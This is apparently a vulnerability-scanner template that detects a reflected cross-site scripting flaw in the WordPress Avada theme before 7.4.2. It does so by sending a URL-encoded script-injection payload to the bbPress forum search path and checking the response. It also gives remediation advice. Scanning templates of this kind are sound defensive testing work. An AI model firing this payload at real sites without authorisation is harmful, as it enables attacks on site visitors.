id: avada-xss
info:
  name: Avada < 7.4.2 - Reflected Cross-Site Scripting
  author:
  - l0ne1y
  tags:
  - xss
  - wp
  - wordpress
  - wp-theme
  - avada
  description: |-
    Wordpress Theme Avada < 7.4.2 has a cross-site scripting vulnerability
    The theme did not properly filter bbPress search statements, resulting in a Reflected Cross-Site Scripting vulnerability.
  reference:
  - https://wpscan.com/vulnerability/eb172b07-56ab-41ce-92a1-be38bab567cb
  - https://theme-fusion.com/documentation/avada/installation-maintenance/avada-changelog/
  severity: medium
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.com/zh-cn/themes/

    Temporary fix:
    1. Filter the input (and URL parameters), encode the output, and combine the whitelist and blacklist. That is to say, filter all submitted content, filter the parameters in the URL, and filter out relevant content that will cause the script to be executed; and then HTML-encode the content dynamically output to the page so that the script cannot be executed in the browser. Although input filtering can be bypassed, a large number of XSS attacks will still be intercepted; finally, characters are whitelisted or blacklisted.
requests:
- matchers:
  - type: word
    condition: and
    part: body
    words:
    - '"></script><script>alert(document.domain)</script>'
    - avada-footer-scripts
  - type: word
    part: header
    words:
    - text/html
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/forums/search/z-->%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/'
  method: GET
